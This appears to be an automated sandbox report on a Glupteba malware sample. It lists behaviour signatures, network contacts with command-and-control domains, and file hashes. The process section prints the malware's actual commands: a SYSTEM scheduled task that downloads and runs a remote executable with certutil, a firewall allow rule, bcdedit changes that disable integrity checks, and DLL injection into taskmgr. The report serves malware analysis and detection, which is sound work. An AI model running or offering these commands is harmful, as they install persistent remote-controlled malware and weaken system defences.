Analysis Overview
SHA256
4dcc466c7b711acae584e6305f8b5d16f95b443cb719f00de89dfb6e5b32cf03
Threat Level: Known bad
The file 6f1f130741c10e884ac91387ba6f1671 was found to be: Known bad.
Malicious Activity Summary
Glupteba
MetaSploit
Glupteba payload
Modifies boot configuration data using bcdedit
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Program crash
Creates scheduled task(s)
GoLang User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-22 07:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-22 07:49
Reported
2024-01-22 07:52
Platform
win7-20231215-en
Max time kernel
1s
Max time network
148s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
|---|---|---|---|
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122074937.log C:\Windows\Logs\CBS\CbsPersist_20240122074937.cab
C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /124-124
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | f07d4c85-f10f-4500-992e-9c511decba96.ninhaine.com | udp |
| US | 8.8.8.8:53 | server4.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard58.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard58.blob.core.windows.net | tcp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server4.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | server4.2makestorage.com | udp |
Files
memory/2124-0-0x0000000004960000-0x0000000004D9C000-memory.dmp
memory/2124-1-0x0000000004960000-0x0000000004D9C000-memory.dmp
memory/2124-2-0x0000000004DA0000-0x00000000056C6000-memory.dmp
memory/2124-3-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2972-5-0x0000000004B60000-0x0000000004F9C000-memory.dmp
memory/2124-4-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2124-6-0x0000000004960000-0x0000000004D9C000-memory.dmp
memory/2124-7-0x0000000004DA0000-0x00000000056C6000-memory.dmp
memory/2972-8-0x0000000004B60000-0x0000000004F9C000-memory.dmp
memory/2972-9-0x0000000000400000-0x00000000030F3000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | 499eabd4f1dff82cb81cb4c3df44da76 |
| SHA1 | 2765b4730b364627585119311b0fce87ef9c6e45 |
| SHA256 | 296f916a6ac6f5e77bd15b649435d11de60fc543bfe0cba3b9c42614ddfbae67 |
| SHA512 | e4585c28abd47404917e567f8ce3a3208cc989d93b27cc600948933d1fcd29b4576e0ed8346ee14079f1abd363652164942cee14f710976461a738102beb3477 |
\Windows\rss\csrss.exe
| MD5 | 6aa89987b804232510d11688123a8c11 |
| SHA1 | d64c4e47737a23425f250b1a82ac4f5f2f8a0f27 |
| SHA256 | 00ed550c939809e40115afd5a321c932fd03650435e453aac9e0ab6c154b3aad |
| SHA512 | c67d6d106735ddf9ec7067ef35295699f113104209e5c33fdc4b51e8835ae4befca59ec98933e93020e502fea3c67eaf34e40a3452f600ee19cb98211c63ec1b |
C:\Windows\rss\csrss.exe
| MD5 | 3fe278eb70b96c11868a3134e1c4ff6f |
| SHA1 | 8d962a63dea82f8edbbf9bd361003cceb8464cba |
| SHA256 | a348f3052917186e1031aa220b3a29eca010d710f9cca8bfab3046108be4349d |
| SHA512 | 69012fd021aacc73365a205beacf88848de295a6474a7a2b4cc76c6d657838c90cb6e991bc64ee939df2337586e527a0ea30f2ab8d71f1248d01906b36143e3e |
memory/2972-17-0x0000000000400000-0x00000000030F3000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | fedef76d64a91a88ebb634be8f4db93a |
| SHA1 | 907a52726c41cd6f85cd71b7e959c41954d1e0a5 |
| SHA256 | 762bdf38f5a4db112a6fbade2705683ebec7c8ecd14877980d8a9e65d10521c6 |
| SHA512 | 22bdd544d20eb1c977089d36cc82f7acd8493a0f4dfe924a7d8759ffe8f18fa549d10c26c2fe344eef6535a8072af2c83a42bfe79971fb1f9efaad0e6b63ccf7 |
memory/2548-19-0x0000000004A40000-0x0000000004E7C000-memory.dmp
memory/2972-20-0x0000000004B60000-0x0000000004F9C000-memory.dmp
memory/2548-21-0x0000000004A40000-0x0000000004E7C000-memory.dmp
memory/2548-22-0x0000000004E80000-0x00000000057A6000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 2c27b040963e92ed4e5a0a1dc86b62f2 |
| SHA1 | 40008cb09009e199e7c2834f29243933f525914f |
| SHA256 | bebf3ef90b5afcadbceaa3f6d31ec605e887771ca0ca080610302d4fc45a4ddb |
| SHA512 | af213a4a27759419488b4fdcd6ded9b79ae17f5b97828f39c7680122554508003e132bc6e91bc9a7421127af29f313b24ceb0726ef3ac4305c953be1cbe67aca |
memory/2548-24-0x0000000000400000-0x00000000030F3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 74942d6ff7cf9cef6a929e6228c6c30b |
| SHA1 | df75f4f9be14926a7ff62c42cc016d3a7058ab7d |
| SHA256 | fda06ef0fbfa14278810a43cd9675aa09bcf6b41a500bc8dc7e8b643f4f8933b |
| SHA512 | 20e6f5a3ac3013661e21a943d367afebe7218df808d8a991facbae6246d55b8c446e089975cf6d09919f8f699bb08771d6e0777e62aae39897728c4abf39bb69 |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 4b25a3c843dd6c49f625b914b0facc65 |
| SHA1 | e518e8f8e25e0d3410954b9e04d456c46d24f54b |
| SHA256 | a4a3ee25c5644d1c406ce750991a1e8e69dc45a60936bad0f9a7c8339ef6113b |
| SHA512 | 31f1f0e94755f0486fa39c6ba6e98ef8ed4c453a0a5d5a3e60b943110aea3f189fa06674373ac25b64683c8d9f0cb7da62c6bd64e6b340e0ec436e5214e2c39c |
memory/2748-41-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | 3b9d4a06fa57529e13413f6d0cf46b63 |
| SHA1 | fa6f1391f42647cdc9658eb6d05d0b77afc660f5 |
| SHA256 | 6f17cbec30d5f10a54caa28bf51acc2a6177874a5044b4f11e2a4d1fb45105be |
| SHA512 | 48f63d24665c842e800cdc935db795b39e032105804ffa0903c6aa6d39fd8db76e4a7a70cc0644b9c3b47c3555ab037ddf88acfa2e485d86354cbb04fd181571 |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 95dbc04b5f2d043c9c7443bf470086a3 |
| SHA1 | 943883ffe35711841b401520869e53fdab395e78 |
| SHA256 | 6d0a948892711fdf81fd0c4cb8d4a0cb6ecbb2a936b31184713331bea6871ce5 |
| SHA512 | 9dee05936d7f6913319329a029c2c40a2a2fd041b586a4662c05b4653ac16745b7ebc5f8538da4df3c1b9b4011bd4aed0b6a4b17e4211dd2d93f03ebbb5dec36 |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | c0c77b59c5c75aecfbed31b0a4d5040f |
| SHA1 | 691cb3493a4cfe9dd3f58036655717b6c8da61e1 |
| SHA256 | 92342a944b20cf24028d6c24c0bbbe2b7afc3519f6bddea15575547453fe70fc |
| SHA512 | b0538141a9faac53ad2cc498d7a6dd40d636384c5db1c32cabf2ee9ebfbe3a099646f33f0f6b009918aa68400426c907de40b95689710917dcfe2c439288a704 |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 8bb42841aea78353b557b14cc8caaf2e |
| SHA1 | 83357aebec0b7eb5064df71e2adac7f849012e1d |
| SHA256 | 43a71be8749fa13e6b7e1043aa16c91434fb0b877e01dddc76a83caf3b1bd6fb |
| SHA512 | 83634b429bc741b23b368b510e0eff21da1fccc32ba7e22baf2722b6949d76de3b9cf1301c73aa391ababb075252b1688864cd9f5f9ca3a561695a34ecda6a40 |
memory/2748-55-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | d89216df6c609e1e65bc9d9fd7eaa50c |
| SHA1 | c411ef43e96321f9458b840a07f8d5368d19056b |
| SHA256 | 819baa1197c8f66f68f1c3da68a3e11e7e71c4a8624a4ddef8a3d577ea70408e |
| SHA512 | c3458057119167d1fc973ad11cf828af2239761b5bd6970b7904110aacabfdcc77eab98cc41fcbe671c910e93cb2c4007aecf4984b5edfb08cd129ab3849aac0 |
C:\Windows\Temp\Tar7929.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Windows\Temp\Cab78E7.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 51f4aa589d408c2a627caac66cb2584e |
| SHA1 | c2bf0001b7f48eec67e4813243a27bdc42e05a64 |
| SHA256 | f40e3b92dd02cd4293b7422bdd607226ea9fad2c2eb55a651d80109c273de673 |
| SHA512 | 19b12b3b8b1b6109cd38e5e79e563952e8881767a311a958fbc526dc48fa3febf2fe23b67c8b197c04cc13a6e9479cd1d2a1a6c2d88f69a88b13719a1262f708 |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a9c83c96196a21934eaed36566618795 |
| SHA1 | db7972224cb8b8b84c92aff05c42b69ea4b29ecf |
| SHA256 | 996cd2357911d3813ca5f2a8196d678478d0bb09a5aec29614d78729f85855eb |
| SHA512 | 4da6feb77c64cf6de741926e5763dd6470c55a6d3dac9e33f1272d6de01fe40b0f2f6f2aadb72fdba481245944f7fcf430fba5e1c51ffd70eebde2cd392b312a |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 643309e4f3f5942508b336c0effd1f5e |
| SHA1 | aac8c8cd90ad5df42599c07c3afdafb599f5a99f |
| SHA256 | 630c96332e449f3ed6d2c39bf0d505a5903ec8efcf837dfed74d7b82ae256144 |
| SHA512 | a5fd5cb185d0f55d94bdf5a9fb827b9718c0a547854c04e565b08492a12223a04ae675ea5890b34105df839c37b76b3895026a16770c92122525c27b3669d232 |
memory/2548-248-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-252-0x0000000004A40000-0x0000000004E7C000-memory.dmp
memory/2548-253-0x0000000000400000-0x00000000030F3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | e955c94aeb61e140041a36add84b3892 |
| SHA1 | f78eb1719a849e342091c6dc22eea460f6872ae5 |
| SHA256 | 0f7fbfa8efb1954f08b8a3caf56c72a5d3b6e7c29b70850f363d657fa318f8cf |
| SHA512 | 661f5be3c15eab627e2788d01dadb778451c7bf184484c228263f8c46791a18db59fd0bcf2fd4a893ea9720295ac549806bbd9509bc0fb930d2ebe0f237116aa |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | c05fb950baacf9ce156280ea8407c203 |
| SHA1 | 422c0d5b242dfbacd8999be8b00807089f41c1a7 |
| SHA256 | 1a648175286d173facd9645e706393d13abb53feb76b2aa17a4f68e0f683af01 |
| SHA512 | e90991e19923e242bbf0234412e58eb3f0499786382db7e2a1bbf1bf1eae7a8e558ac54939232bb07f7eb59f5e1aa74cb0705cc50487cae5bbd3df0cdb939da2 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | 02f3936dbdb185641196388ea56f8060 |
| SHA1 | b66c9fbf39b6be44e9fe9ffc8caff260ab74ee64 |
| SHA256 | 7473b90564b881e251dd89d33b31bb18008f5c51d2ddadb2a0437d111e8bbe4e |
| SHA512 | 1c00b654a85f359b168b3c88318598c47ec88e34490fe368efdbcfed6220703f7d11f3595937f807fb817eea65290ffcdd8b18d605d3d7bc6f7cb6d2a7d27335 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 5da3a881ef991e8010deed799f1a5aaf |
| SHA1 | fea1acea7ed96d7c9788783781e90a2ea48c1a53 |
| SHA256 | f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4 |
| SHA512 | 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c7b57b837e31b145d77f4d575df1b8c5 |
| SHA1 | 8fd19ae163f3d4e53b2e1459fbe98bbe43310784 |
| SHA256 | 27dde6fca4c2dba5f681cf252a57ed4e1d587f386cce783d0c98ea1fa88812e6 |
| SHA512 | 9dd507b32ce0cd549497ab52a643ba5917f72e86f9ce5b58ca5c6ed684172d8097921791790282455dad2997068604c161f1d2db158c1374bee037db638e8a0b |
memory/2548-305-0x0000000000400000-0x00000000030F3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/2548-331-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-337-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-338-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-363-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-364-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-365-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-366-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-367-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-368-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-369-0x0000000000400000-0x00000000030F3000-memory.dmp
memory/2548-370-0x0000000000400000-0x00000000030F3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-22 07:49
Reported
2024-01-22 07:52
Platform
win10v2004-20231222-en
Max time kernel
3s
Max time network
145s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
|---|---|---|---|
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4032 -ip 4032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 820
